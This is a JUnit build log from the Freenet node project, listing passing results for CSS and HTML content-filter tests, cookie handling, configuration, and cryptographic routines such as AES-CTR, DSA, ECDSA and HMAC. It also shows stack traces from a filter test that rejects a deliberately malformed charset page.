    [junit] Test 30 : h1 + h2 { margin-top: -5mm } -> h1+h2 { margin-top: -5mm }
    [junit] Test 31 : p:first-letter { font-size: 3em; font-weight: normal } -> p:first-letter { font-size: 3em; font-weight: normal }
    [junit] Test 32 : h1.opener + h2 { margin-top: -5mm } -> h1.opener+h2 { margin-top: -5mm }
    [junit] Test 33 : table          { border-collapse: collapse; border: 5px solid yellow; } *#col1         { border: 3px solid black; } td             { border: 1px solid red; padding: 1em; } td.cell5       { border: 5px dashed blue; } td.cell6       { border: 5px solid green; } -> table { border-collapse: collapse; border: 5px solid yellow; } *#col1 { border: 3px solid black; } td { border: 1px solid red; padding: 1em; } td.cell5 { border: 5px dashed blue; } td.cell6 { border: 5px solid green; }
    [junit] Test 34 : div > p:first-child { text-indent: 0 } -> div>p:first-child { text-indent: 0 }
    [junit] Test 35 : p[example="public class foo\
    [junit] {\
    [junit]     private int x;\
    [junit] \
    [junit]     foo(int x) {\
    [junit]         this.x = x;\
    [junit]     }\
    [junit] \
    [junit] }"] { color: red } -> p[example="public class foo{    private int x;    foo(int x) {        this.x = x;    }}"] { color: red }
    [junit] Test 36 : h1:lang(fr) {} -> h1:lang(fr)
    [junit] Test 37 : div.foo {} -> div.foo
    [junit] Test 38 : h1>h2 {} -> h1>h2
    [junit] Test 39 : [foo|="en"] {} -> [foo|="en"]
    [junit] Test 40 : p:first-line { text-transform: uppercase;} -> p:first-line { text-transform: uppercase;}
    [junit] Test 41 : h1+h2 {} -> h1+h2
    [junit] Test 42 : h1 em { color: blue;} -> h1 em { color: blue;}
    [junit] Test 43 : body > P { line-height: 1.3 } -> body>P { line-height: 1.3 }
    [junit] Test 44 : h1[foo="bar\" bar"] {} -> h1[foo="bar\" bar"]
    [junit] Test 45 : * {} -> *
    [junit] Bad selector test 0
    [junit] Bad selector test 1
    [junit] Bad selector test 2
    [junit] Bad selector test 3
    [junit] Bad selector test 4
    [junit] Bad selector test 5
    [junit] Bad selector test 6
    [junit] Bad selector test 7
    [junit] Bad selector test 8
    [junit] Bad selector test 9
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,167 sec
    [junit] 
    [junit] Testcase: testCSS3Selector took 1,92 sec
    [junit] Testcase: testProperties took 4,308 sec
    [junit] Testcase: testMaybeCharset took 0,986 sec
    [junit] Testcase: testWhitespace took 0,194 sec
    [junit] Testcase: testCSS2Selector took 0,411 sec
    [junit] Testcase: testBackgroundURL took 0,252 sec
    [junit] Testcase: testTripleCommentStart took 0,201 sec
    [junit] Testcase: testCharset took 0,832 sec
    [junit] Testcase: testComment took 0,185 sec
    [junit] Testcase: testEscape took 0,183 sec
    [junit] Testcase: testImports took 0,446 sec
    [junit] Testcase: testCSS1Selector took 0,196 sec
    [junit] Testcase: testDoubleCommentStart took 0,196 sec
    [junit] Testcase: testNewlines took 0,199 sec
    [junit] Running freenet.client.filter.ContentFilterTest$TagVerifierTest
    [junit] Testsuite: freenet.client.filter.ContentFilterTest$TagVerifierTest
    [junit] Tests run: 10, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,271 sec
    [junit] 
    [junit] Testcase: testMetaTagHTMLContentType took 1,351 sec
    [junit] Testcase: testFormTag took 0,013 sec
    [junit] Testcase: testInvalidInputTag took 0,005 sec
    [junit] Testcase: testMetaTagXHTMLContentType took 0,004 sec
    [junit] Testcase: testInvalidFormMethod took 0,003 sec
    [junit] Testcase: testBodyTag took 0,003 sec
    [junit] Testcase: testLinkTag took 0,308 sec
    [junit] Testcase: testMetaTagUnknownContentType took 0,004 sec
    [junit] Testcase: testHTMLTagWithInvalidNS took 0,005 sec
    [junit] Testcase: testValidInputTag took 0,003 sec
    [junit] Running freenet.client.filter.ContentFilterTest
    [junit] Testsuite: freenet.client.filter.ContentFilterTest
    [junit] Corrupt or malicious web page (unable to filter the page)!
    [junit]     at freenet.client.filter.HTMLFilter.throwFilterException(HTMLFilter.java:701)
    [junit]     at freenet.client.filter.HTMLFilter$HTMLParseContext.run(HTMLFilter.java:296)
    [junit]     at freenet.client.filter.HTMLFilter.readFilter(HTMLFilter.java:84)
    [junit]     at freenet.client.filter.ContentFilterTest.testEvilCharset(ContentFilterTest.java:293)
    [junit] Failure: Corrupt or malicious web page (unable to filter the page)!
    [junit] Failure: Corrupt or malicious web page (unable to filter the page)!
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,544 sec
    [junit] ------------- Standard Output ---------------
    [junit] Failure: Corrupt or malicious web page (unable to filter the page)!
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit] Failure: Corrupt or malicious web page (unable to filter the page)!
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Corrupt or malicious web page (unable to filter the page)!
    [junit]     at freenet.client.filter.HTMLFilter.throwFilterException(HTMLFilter.java:701)
    [junit]     at freenet.client.filter.HTMLFilter$HTMLParseContext.run(HTMLFilter.java:296)
    [junit]     at freenet.client.filter.HTMLFilter.readFilter(HTMLFilter.java:84)
    [junit]     at freenet.client.filter.ContentFilterTest.testEvilCharset(ContentFilterTest.java:293)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] Corrupt or malicious web page (unable to filter the page)!
    [junit]     at freenet.client.filter.HTMLFilter.throwFilterException(HTMLFilter.java:701)
    [junit]     at freenet.client.filter.HTMLFilter$HTMLParseContext.run(HTMLFilter.java:296)
    [junit]     at freenet.client.filter.HTMLFilter.readFilter(HTMLFilter.java:84)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at freenet.client.filter.ContentFilter.filter(ContentFilter.java:294)
    [junit]     at freenet.client.filter.ContentFilterTest.testEvilCharset(ContentFilterTest.java:309)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] Corrupt or malicious web page (unable to filter the page)!
    [junit]     at freenet.client.filter.HTMLFilter.throwFilterException(HTMLFilter.java:701)
    [junit]     at freenet.client.filter.HTMLFilter$HTMLParseContext.run(HTMLFilter.java:296)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit]     at freenet.client.filter.HTMLFilter.readFilter(HTMLFilter.java:84)
    [junit]     at freenet.client.filter.ContentFilter.filter(ContentFilter.java:294)
    [junit]     at freenet.client.filter.ContentFilterTest.testEvilCharset(ContentFilterTest.java:309)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testMetaRefresh took 2,4 sec
    [junit] Testcase: testLowerCaseExtensions took 0,005 sec
    [junit] Testcase: testHTMLFilter took 1,575 sec
    [junit] Testcase: testEvilCharset took 0,055 sec
    [junit] Running freenet.client.filter.FilterUtilsTest
    [junit] Testsuite: freenet.client.filter.FilterUtilsTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,555 sec
    [junit] 
    [junit] Testcase: testInvalidLengthUnits took 0,064 sec
    [junit] Testcase: testValidLenthUnits took 0,011 sec
    [junit] Running freenet.client.filter.JPEGFilterTest
    [junit] Testsuite: freenet.client.filter.JPEGFilterTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,564 sec
    [junit] 
    [junit] Testcase: testThatAThumbnailExtensionCodeIsPreserved took 0,085 sec
    [junit] Running freenet.client.filter.PNGFilterTest
    [junit] Testsuite: freenet.client.filter.PNGFilterTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,801 sec
    [junit] 
    [junit] Testcase: testSuiteTest took 0,334 sec
    [junit] Running freenet.clients.fcp.FCPPluginConnectionImplTest
    [junit] Testsuite: freenet.clients.fcp.FCPPluginConnectionImplTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,581 sec
    [junit] 
    [junit] Testcase: testSendSynchronousThreadSafety took 1,052 sec
    [junit] Running freenet.clients.fcp.FCPPluginMessageEncodeDecodeTest
    [junit] Testsuite: freenet.clients.fcp.FCPPluginMessageEncodeDecodeTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,883 sec
    [junit] 
    [junit] Testcase: testEncodeDecode took 0,43 sec
    [junit] Running freenet.clients.http.CookieTest
    [junit] Testsuite: freenet.clients.http.CookieTest
    [junit] sessionid=abCd12345;version=1;path=/Freetalk;expires=Sat, 02 Apr 2016 15:26:46 GMT;discard=true;
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,793 sec
    [junit] 
    [junit] Testcase: testGetValue took 0,074 sec
    [junit] Testcase: testEncodeToHeaderValue took 0,007 sec
    [junit] Testcase: testGetName took 0,001 sec
    [junit] Testcase: testGetPath took 0,002 sec
    [junit] Testcase: testCookieURIStringStringDate took 0,07 sec
    [junit] Testcase: testEqualsObject took 0,007 sec
    [junit] Testcase: testGetDomain took 0,001 sec
    [junit] Running freenet.clients.http.FilterCSSIdentifierTest
    [junit] Testsuite: freenet.clients.http.FilterCSSIdentifierTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,595 sec
    [junit] 
    [junit] Testcase: testInvalidFirstDash took 0,082 sec
    [junit] Testcase: testInvalidChar took 0,001 sec
    [junit] Testcase: testKnownValid took 0,003 sec
    [junit] Running freenet.clients.http.ReceivedCookieTest
    [junit] Testsuite: freenet.clients.http.ReceivedCookieTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,08 sec
    [junit] 
    [junit] Testcase: testParseHeader took 0,232 sec
    [junit] Testcase: testEncodeToHeaderValue took 0,002 sec
    [junit] Testcase: testGetDomain took 0,002 sec
    [junit] Testcase: testGetValue took 0,003 sec
    [junit] Testcase: testGetName took 0,002 sec
    [junit] Testcase: testGetPath took 0,002 sec
    [junit] Testcase: testCookieURIStringStringDate took 0,049 sec
    [junit] Testcase: testEqualsObject took 0,004 sec
    [junit] Running freenet.config.ConfigTest
    [junit] Testsuite: freenet.config.ConfigTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,188 sec
    [junit] 
    [junit] Testcase: testGet took 0,217 sec
    [junit] Testcase: testRegister took 0,428 sec
    [junit] Testcase: testConfig took 0,001 sec
    [junit] Testcase: testGetConfigs took 0,002 sec
    [junit] Running freenet.crypt.AEADBucketTest
    [junit] Testsuite: freenet.crypt.AEADBucketTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,009 sec
    [junit] 
    [junit] Testcase: testCopyBucketNotDivisibleBy16 took 0,564 sec
    [junit] Running freenet.crypt.AEADStreamsTest
    [junit] Testsuite: freenet.crypt.AEADStreamsTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,031 sec
    [junit] 
    [junit] Testcase: testCorruptedRoundTrip took 2,279 sec
    [junit] Testcase: testGarbageAfterClose took 0,172 sec
    [junit] Testcase: testSuccessfulRoundTrip took 0,641 sec
    [junit] Testcase: testCloseEarly took 0,012 sec
    [junit] Testcase: testTruncatedReadsWritesRoundTrip took 0,455 sec
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12297089ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12260651ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Running freenet.crypt.CTRBlockCipherTest
    [junit] Testsuite: freenet.crypt.CTRBlockCipherTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 14,94 sec
    [junit] 
    [junit] Testcase: testNISTRandomLength took 9,858 sec
    [junit] Testcase: testNIST took 0,002 sec
    [junit] Testcase: testRandomJCA took 1,227 sec
    [junit] Testcase: testRandom took 3,371 sec
    [junit] Running freenet.crypt.CryptByteBufferTest
    [junit] Testsuite: freenet.crypt.CryptByteBufferTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12398804ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12373630ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 30, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 9,693 sec
    [junit] 
    [junit] Testcase: testSuccessfulRoundTripByteArrayNewInstance took 8,107 sec
    [junit] Testcase: testSetIVIvParameterSpec took 0,062 sec
    [junit] Testcase: testEncryptWrapByteBuffer took 0,027 sec
    [junit] Testcase: testEncryptByteArrayIntIntOffsetOutOfBounds took 0,009 sec
    [junit] Testcase: testEncryptByteArrayIntIntLengthOutOfBounds took 0,009 sec
    [junit] Testcase: testGenIV took 0,002 sec
    [junit] Testcase: testGetIV took 0,004 sec
    [junit] Testcase: testGenIVLength took 0,002 sec
    [junit] Testcase: testGenIVUnsupportedTypeException took 0,001 sec
    [junit] Testcase: testEncryptByteBufferToByteBufferDirect took 0,015 sec
    [junit] Testcase: testDecryptByteArrayNullInput took 0,013 sec
    [junit] Testcase: testRoundRandomLengthBytes took 0,11 sec
    [junit] Testcase: testSetIVIvParameterSpecNullInput took 0,002 sec
    [junit] Testcase: testSuccessfulRoundTripByteArrayReset took 0,018 sec
    [junit] Testcase: testSuccessfulRoundTripInPlace took 0,013 sec
    [junit] Testcase: testDecryptByteArrayIntIntNullInput took 0,042 sec
    [junit] Testcase: testOverlappingDecode took 0,065 sec
    [junit] Testcase: testEncryptDirectByteBuffer took 0,056 sec
    [junit] Testcase: testOverlappingEncode took 0,051 sec
    [junit] Testcase: testEncryptByteBufferToByteBuffer took 0,02 sec
    [junit] Testcase: testRoundOneByte took 0,04 sec
    [junit] Testcase: testSuccessfulRoundTripInPlaceOffset took 0,038 sec
    [junit] Testcase: testEncryptByteArrayIntIntNullInput took 0,024 sec
    [junit] Testcase: testEncryptByteArrayNullInput took 0,011 sec
    [junit] Testcase: testSetIVIvParameterSpecUnsupportedTypeException took 0,015 sec
    [junit] Testcase: testSuccessfulRoundTripByteArray took 0,04 sec
    [junit] Testcase: testDecryptByteArrayIntIntOffsetOutOfBounds took 0,022 sec
    [junit] Testcase: testSuccessfulRoundTripOutOfPlaceOffset took 0,034 sec
    [junit] Testcase: testDecryptWrapByteBuffer took 0,025 sec
    [junit] Testcase: testDecryptByteArrayIntIntLengthOutOfBounds took 0,027 sec
    [junit] Running freenet.crypt.CryptUtilTest
    [junit] Testsuite: freenet.crypt.CryptUtilTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi2947201881134795957lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,78 sec
    [junit] 
    [junit] Testcase: testRandomBytes took 2,019 sec
    [junit] Testcase: testSecureRandomBytes took 0,268 sec
    [junit] Running freenet.crypt.DSAGroupGeneratorTest
    [junit] Testsuite: freenet.crypt.DSAGroupGeneratorTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,657 sec
    [junit] 
    [junit] Testcase: testIsPrime took 0,17 sec
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi6138669811090174832lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Running freenet.crypt.DSATest
    [junit] Testsuite: freenet.crypt.DSATest
    [junit] Tests run: 7, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,221 sec
    [junit] 
    [junit] Testcase: testSign_grp_pvtKey_r_kInv_m_rand took 0,027 sec
    [junit] Testcase: testSameSignConsistency took 0,02 sec
    [junit] Testcase: testSign_grp_pvtKey_m_rand took 0,126 sec
    [junit] Testcase: testSign_grp_pvtKey_k_m_rand took 0,551 sec
    [junit] Testcase: testSignAndVerify took 0,006 sec
    [junit] Testcase: testSignSmallQValue took 0,007 sec
    [junit] Testcase: testVerify took 0,003 sec
    [junit] Running freenet.crypt.ECDHTest
    [junit] Testsuite: freenet.crypt.ECDHTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,886 sec
    [junit] 
    [junit] Testcase: testGetPublicKey took 3,224 sec
    [junit] Testcase: testGetAgreedSecret took 0,18 sec
    [junit] Running freenet.crypt.ECDSATest
    [junit] Testsuite: freenet.crypt.ECDSATest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,025 sec
    [junit] 
    [junit] Testcase: testGetPublicKey took 6,476 sec
    [junit] Testcase: testSign took 0,316 sec
    [junit] Testcase: testAsFieldSet took 0,184 sec
    [junit] Testcase: testSignToNetworkFormat took 0,157 sec
    [junit] Testcase: testVerify took 0,323 sec
    [junit] Testcase: testSerializeUnserialize took 0,045 sec
    [junit] Running freenet.crypt.EncryptedRandomAccessBucketTest
    [junit] Testsuite: freenet.crypt.EncryptedRandomAccessBucketTest
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,694 sec
    [junit] 
    [junit] Testcase: testIrregularWritesNotOverlapping took 1,214 sec
    [junit] Testcase: testBucketToRAF took 1,14 sec
    [junit] Testcase: testSerialize took 0,363 sec
    [junit] Testcase: testIrregularWrites took 0,034 sec
    [junit] Testcase: testStoreTo took 0,104 sec
    [junit] Testcase: testReadExcess took 0,03 sec
    [junit] Testcase: testReuse took 0,034 sec
    [junit] Testcase: testReadEmpty took 0,01 sec
    [junit] Testcase: testReadWrite took 0,053 sec
    [junit] Testcase: testLargeData took 0,23 sec
    [junit] Testcase: testNegative took 0,009 sec
    [junit] Running freenet.crypt.EncryptedRandomAccessBufferAltTest
    [junit] Testsuite: freenet.crypt.EncryptedRandomAccessBufferAltTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 18,923 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 18,923 sec
    [junit] 
    [junit] Testcase: testArray took 16,49 sec
    [junit] Testcase: testClose took 0,06 sec
    [junit] Testcase: testSize took 0,104 sec
    [junit] Testcase: testFormula took 1,409 sec
    [junit] Testcase: testWriteOverLimit took 0,424 sec
    [junit] Running freenet.crypt.EncryptedRandomAccessBufferTest
    [junit] Testsuite: freenet.crypt.EncryptedRandomAccessBufferTest
    [junit] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,649 sec
    [junit] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,649 sec
    [junit] 
    [junit] Testcase: testSuccesfulRoundTrip took 0,722 sec
    [junit] Testcase: testClose took 0,026 sec
    [junit] Testcase: testSize took 0,038 sec
    [junit] Testcase: testSuccesfulRoundTripReadHeader took 0,107 sec
    [junit] Testcase: testClosePwrite took 0,094 sec
    [junit] Testcase: testWrongMagic took 0,025 sec
    [junit] Testcase: testPreadFileOffsetTooSmall took 0,018 sec
    [junit] Testcase: testPreadFileOffsetTooBig took 0,013 sec
    [junit] Testcase: testUnderlyingRandomAccessThingTooSmall took 0,005 sec
    [junit] Testcase: testSerialize took 0,418 sec
    [junit] Testcase: testEncryptedRandomAccessThingNullInput1 took 0,002 sec
    [junit] Testcase: testEncryptedRandomAccessThingNullInput3 took 0,011 sec
    [junit] Testcase: testWrongMasterSecret took 0,053 sec
    [junit] Testcase: testPwriteFileOffsetTooBig took 0,037 sec
    [junit] Testcase: testEncryptedRandomAccessThingNullBARAT took 0,014 sec
    [junit] Testcase: testWrongERATType took 0,061 sec
    [junit] Testcase: testEncryptedRandomAccessThingNullByteArray took 0,015 sec
    [junit] Testcase: testPwriteFileOffsetTooSmall took 0,021 sec
    [junit] Testcase: testClosePread took 0,023 sec
    [junit] Testcase: testStoreTo took 0,157 sec
    [junit] Running freenet.crypt.EncryptingIoAdapterTest
    [junit] Testsuite: freenet.crypt.EncryptingIoAdapterTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12276495ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12260849ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 58,147 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 58,147 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12276495ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12260849ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testFlatRandom took 10,436 sec
    [junit] Testcase: testClobberBuffer took 0,004 sec
    [junit] Testcase: testMirrored took 4,755 sec
    [junit] Testcase: testLinear took 42,44 sec
    [junit] Running freenet.crypt.HMACTest
    [junit] Testsuite: freenet.crypt.HMACTest
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,299 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,299 sec
    [junit] 
    [junit] Testcase: testWrongKeySize took 1,111 sec
    [junit] Testcase: testAllCipherNames took 0,345 sec
    [junit] Testcase: testBenchmark took 0,202 sec
    [junit] Testcase: testKnownVectors took 0,092 sec
    [junit] Testcase: testSHA256SignVerify took 0,083 sec
    [junit] Running freenet.crypt.KeyGenUtilsTest
    [junit] Testsuite: freenet.crypt.KeyGenUtilsTest
    [junit] 16
    [junit] 32
    [junit] 16
    [junit] 32
    [junit] 32
    [junit] 48
    [junit] 64
    [junit] 32
    [junit] 16
    [junit] 32
    [junit] Tests run: 47, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,439 sec
    [junit] Tests run: 47, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,439 sec
    [junit] ------------- Standard Output ---------------
    [junit] 16
    [junit] 32
    [junit] 16
    [junit] 32
    [junit] 32
    [junit] 48
    [junit] 64
    [junit] 32
    [junit] 16
    [junit] 32
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testGetPublicKeyPairNotNull took 0,019 sec
    [junit] Testcase: testGetPublicKeyNullInput1 took 0,001 sec
    [junit] Testcase: testGetPublicKeyNullInput2 took 0,001 sec
    [junit] Testcase: testGetPublicKeyPairNullInput1 took 0,001 sec
    [junit] Testcase: testGetPublicKeyPairNullInput2 took 0 sec
    [junit] Testcase: testDeriveIvParameterSpec took 0,074 sec
    [junit] Testcase: testGenNonceLength took 0,103 sec
    [junit] Testcase: testGenSecretKeyKeySize took 0,636 sec
    [junit] Testcase: testGetPublicKey took 0,024 sec
    [junit] Testcase: testGetPublicKeyPair took 0,03 sec
    [junit] Testcase: testGetPublicKeyDSAType took 0,007 sec
    [junit] Testcase: testGenIV took 0,014 sec
    [junit] Testcase: testGenKeyPairPublicKeyLength took 0,21 sec
    [junit] Testcase: testGetIvParameterSpecOffsetOutOfBounds took 0 sec
    [junit] Testcase: testGetIvParameterSpecLengthOutOfBounds took 0,001 sec
    [junit] Testcase: testGetKeyPairPublicKeyPrivateKey took 0 sec
    [junit] Testcase: testDeriveSecretKey took 0,043 sec
    [junit] Testcase: testGetSecretKeyNullInput1 took 0,001 sec
    [junit] Testcase: testGetSecretKeyNullInput2 took 0,001 sec
    [junit] Testcase: testGenKeyPairNullInput took 0,001 sec
    [junit] Testcase: testGetIvParameterSpecLength took 0,001 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayNullInput1 took 0 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayNullInput2 took 0,022 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayNullInput3 took 0,028 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayByteArray took 0,035 sec
    [junit] Testcase: testGetKeyPairKeyPairTypeByteArrayDSAType took 0,001 sec
    [junit] Testcase: testGenSecretKeyNullInput took 0,001 sec
    [junit] Testcase: testDeriveSecretKeyLength took 0,143 sec
    [junit] Testcase: testGetKeyPairPublicKeyPrivateKeySamePrivate took 0,001 sec
    [junit] Testcase: testGetSecretKey took 0,009 sec
    [junit] Testcase: testDeriveSecretKeyNullInput1 took 0,051 sec
    [junit] Testcase: testDeriveSecretKeyNullInput2 took 0,001 sec
    [junit] Testcase: testDeriveSecretKeyNullInput3 took 0 sec
